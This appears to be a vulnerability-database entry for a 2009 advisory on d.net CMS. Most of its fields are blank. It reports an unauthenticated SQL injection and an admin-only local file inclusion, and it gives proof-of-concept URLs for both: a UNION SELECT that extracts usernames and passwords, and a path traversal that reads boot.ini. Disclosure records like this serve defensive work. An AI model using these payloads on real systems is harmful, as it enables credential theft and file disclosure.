vendor:
d.net CMS
by:
SirGod
N/A
CVSS
N/A
SQL Injection and Local File Inclusion
N/A
CWE
Product Name: d.net CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
d.net CMS (LFI/SQLI) Multiple Remote Vulnerabilities
d.net CMS is vulnerable to SQL Injection and Local File Inclusion. No admin is required for SQL Injection, while admin is required for Local File Inclusion. The PoC for SQL Injection is http://127.0.0.1/path/index.php?page=null+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7+from+cms_security_master+where+id=1-- and for Local File Inclusion is http://127.0.0.1/path/dnet_admin/index.php?edit_id=2&_p=2&type=../../../../../../boot.ini%00
Mitigation:
N/A